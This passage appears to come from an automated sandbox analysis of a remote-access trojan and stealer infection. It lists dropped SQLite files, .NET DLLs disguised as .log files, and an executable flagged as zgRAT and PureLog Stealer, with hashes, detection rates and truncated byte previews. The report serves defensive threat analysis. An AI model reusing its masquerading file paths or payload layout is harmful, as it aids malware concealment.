                                                                                  Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\xwQjogXwjK

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 6
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.8508558324143882
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:TLlF1kwNbXYFpFNYcw+6UwcQVXH5fBaJvWKC0ABndzGrW7swaE:TxFawNLopFgU10XJBaEKQxdgQsw
                                                                                  MD5:933D6D14518371B212F36C3835794D75
                                                                                  SHA1:92D056D912B3C0260D379330D3CC0359B57A322B
                                                                                  SHA-256:55390EE61FB85370A8A7F51A8DD5374F7B1801D1D7DF09D6A90CDD74ED6E7D1E
                                                                                  SHA-512:EAC706D8A579500EADA26FB9883E1F3CE9112A03F38EE78B11B393AB0A3285945F8E06EB406BFC17D1CB540F840E435E515FABFC265399CE6F5193980FDE3F2C
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\yJsjIzaQAt

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.6732424250451717
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                  MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                  SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                  SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                  SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\yu9aJp714O

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):106496
                                                                                  Entropy (8bit):1.136471148832945
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                                                  MD5:37B1FC046E4B29468721F797A2BB968D
                                                                                  SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                                                  SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                                                  SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\z6O1yWSgyB

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                                  Category:dropped
                                                                                  Size (bytes):196608
                                                                                  Entropy (8bit):1.1239949490932863
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                                  MD5:271D5F995996735B01672CF227C81C17
                                                                                  SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                                  SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                                  SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\zRl4ghrSyq

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                                  Category:dropped
                                                                                  Size (bytes):196608
                                                                                  Entropy (8bit):1.1239949490932863
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                                  MD5:271D5F995996735B01672CF227C81C17
                                                                                  SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                                  SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                                  SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\zSy2q65NVo

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):106496
                                                                                  Entropy (8bit):1.136471148832945
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                                                  MD5:37B1FC046E4B29468721F797A2BB968D
                                                                                  SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                                                  SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                                                  SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\Desktop\BLdnhdFQ.log

                                                                                  Download File
                                                                                  Process:C:\ServerWinRuntimeBroker\chainPorthostCommon.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):33792
                                                                                  Entropy (8bit):5.541771649974822
                                                                                  Encrypted:false
                                                                                  SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                                                  MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                                                  SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                                                  SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                                                  SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 38%
                                                                                  Joe Sandbox View:
                                                                                  • Filename: hz7DzW2Yop.exe, Detection: malicious, Browse
                                                                                  • Filename: 3XtEci4Mmo.exe, Detection: malicious, Browse
                                                                                  • Filename: wxl1r0lntg.exe, Detection: malicious, Browse
                                                                                  • Filename: HaLCYOFjMN.exe, Detection: malicious, Browse
                                                                                  • Filename: Z90Z9bYzPa.exe, Detection: malicious, Browse
                                                                                  • Filename: 0J5DzstGPi.exe, Detection: malicious, Browse
                                                                                  • Filename: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, Detection: malicious, Browse
                                                                                  • Filename: aW6kSsgdvv.exe, Detection: malicious, Browse
                                                                                  • Filename: HMhdtzxEHf.exe, Detection: malicious, Browse
                                                                                  • Filename: kJrNOFEGbQ.exe, Detection: malicious, Browse
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                  C:\Users\user\Desktop\JgiUHXBa.log

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):85504
                                                                                  Entropy (8bit):5.8769270258874755
                                                                                  Encrypted:false
                                                                                  SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                                  MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                                  SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                                  SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                                  SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                  • Antivirus: ReversingLabs, Detection: 71%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

                                                                                  C:\Users\user\Desktop\OTzTkTQO.log

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):23552
                                                                                  Entropy (8bit):5.519109060441589
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                                                  MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                                                  SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                                                  SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                                                  SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                  • Antivirus: ReversingLabs, Detection: 8%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                  C:\Users\user\Desktop\PHEbWhMM.log

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):32256
                                                                                  Entropy (8bit):5.631194486392901
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                                  MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                                  SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                                  SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                                  SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 25%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                  C:\Users\user\Desktop\SSuSBQke.log

                                                                                  Download File
                                                                                  Process:C:\ServerWinRuntimeBroker\chainPorthostCommon.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):69632
                                                                                  Entropy (8bit):5.932541123129161
                                                                                  Encrypted:false
                                                                                  SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                                  MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                                  SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                                  SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                                  SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                  • Antivirus: ReversingLabs, Detection: 50%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

                                                                                  C:\Users\user\Desktop\XCTiUwVw.log

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):33792
                                                                                  Entropy (8bit):5.541771649974822
                                                                                  Encrypted:false
                                                                                  SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                                                  MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                                                  SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                                                  SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                                                  SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 38%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                  C:\Users\user\Desktop\ZPhRdffT.log

                                                                                  Download File
                                                                                  Process:C:\ServerWinRuntimeBroker\chainPorthostCommon.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):23552
                                                                                  Entropy (8bit):5.519109060441589
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                                                  MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                                                  SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                                                  SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                                                  SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                  • Antivirus: ReversingLabs, Detection: 8%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                  C:\Users\user\Desktop\keVXUmFt.log

                                                                                  Download File
                                                                                  Process:C:\ServerWinRuntimeBroker\chainPorthostCommon.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):85504
                                                                                  Entropy (8bit):5.8769270258874755
                                                                                  Encrypted:false
                                                                                  SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                                  MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                                  SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                                  SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                                  SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                  • Antivirus: ReversingLabs, Detection: 71%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

                                                                                  C:\Users\user\Desktop\kmFpzVgz.log

                                                                                  Download File
                                                                                  Process:C:\ServerWinRuntimeBroker\chainPorthostCommon.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):32256
                                                                                  Entropy (8bit):5.631194486392901
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                                  MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                                  SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                                  SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                                  SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 25%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                  C:\Users\user\Desktop\pOvooSqL.log

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):69632
                                                                                  Entropy (8bit):5.932541123129161
                                                                                  Encrypted:false
                                                                                  SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                                  MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                                  SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                                  SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                                  SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                  • Antivirus: ReversingLabs, Detection: 50%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

                                                                                  C:\Windows\DiagTrack\Scenarios\21b1a557fd31cc

                                                                                  Download File
                                                                                  Process:C:\ServerWinRuntimeBroker\chainPorthostCommon.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):76
                                                                                  Entropy (8bit):5.366091329119195
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Hi1TUvQK1Nx01qhDdcoAx1XmaHLN6AUUqn:C1TUIkL3eoAPzHkSqn
                                                                                  MD5:0BBB88B51F8BB1F41C821814ADA2FBA5
                                                                                  SHA1:035DD7FD425F3A885B8723C2309AC6F7669CB9A8
                                                                                  SHA-256:DE8460304720B50CC9CE403C5E84DB85D4292EE8AAC76CFB6AAC75CBA3F88C9F
                                                                                  SHA-512:FB2718B06DB6828476274D2AC754C3EB26E56A6F7F925D9C39D2D7050BA45D96C0C265D0CAD39FA891874AA079BE11555E808B761B7FB5F4580110574EF61D0D
                                                                                  Malicious:false
                                                                                  Preview:2nFGW7gi6xqeqr3ktuXMKYwDZUKVHShKBIQPZODfWneb2yIp4PDc0T3e0BrCwLbnPfdhbnKeq1zg

                                                                                  C:\Windows\DiagTrack\Scenarios\dasHost.exe

                                                                                  Download File
                                                                                  Process:C:\ServerWinRuntimeBroker\chainPorthostCommon.exe
                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):1960448
                                                                                  Entropy (8bit):7.549634788914284
                                                                                  Encrypted:false
                                                                                  SSDEEP:49152:rmEq5m1AfIGxLnCllU3WU8zMYCNCsr+QKujfx:rmEq5GGxLnIlP2NgQKGfx
                                                                                  MD5:CF5B49706562BA2047CDA4A451DD573A
                                                                                  SHA1:D7D66016B5EA4215581F208C7972B2FF49CBEED1
                                                                                  SHA-256:74547E5B862BD3691947B78EABBDAB88C468E26144BD03911BE68941376DC89B
                                                                                  SHA-512:0DC54FC8AFE4A1B8CE0D72E215CF617DBC657F4E02CABE7BE694B0D20BE385F63848E49717BD4856547DBB52F8A762E54C63323B53188CC1D8127C54B6A10F1E
                                                                                  Malicious:true
                                                                                  Yara Hits:
                                                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Windows\DiagTrack\Scenarios\dasHost.exe, Author: Joe Security
                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Windows\DiagTrack\Scenarios\dasHost.exe, Author: Joe Security
                                                                                  Antivirus:
                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                  • Antivirus: ReversingLabs, Detection: 83%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....LTg............................N.... ... ....@.. .......................`............@.....................................K.... .. ....................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc... .... ......................@....reloc.......@......................@..B................0.......H...........................h...}........................................0..........(.... ........8........E........<.......`...8....(.... ........8....(.... ....~{...{|...9....& ....8....(.... ....~{...{....9....& ....8....*....0.......... ........8........E....;...............G...86...~....(W... .... .... ....s....~....([....... ....8....r...ps....z*....~....(_...~....(c... ....?.... ....~{...{....9j...& ....8_......... ....8O...~....:.... ....~{...{l...91...& ....8&.....(.

                                                                                  C:\Windows\LiveKernelReports\9e8d7a4ca61bd9

                                                                                  Download File
                                                                                  Process:C:\ServerWinRuntimeBroker\chainPorthostCommon.exe
                                                                                  File Type:ASCII text, with very long lines (871), with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):871
                                                                                  Entropy (8bit):5.90529679902115
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:oEXcy431mB6Hc1A1SyZy3dsEaQzc19rqyK97PJ0uQDX:oucJ3W6F1SyZBEaOCOyKf0uQDX
                                                                                  MD5:4D7188DBC9EAB320E39F59F524422241
                                                                                  SHA1:CD7FEF61728510A3588621EC80C8314E5A9149AE
                                                                                  SHA-256:94CA180B0F21EC392DB6BD76CFC768CC5EA641898E3C5067566113C4D8EA9213
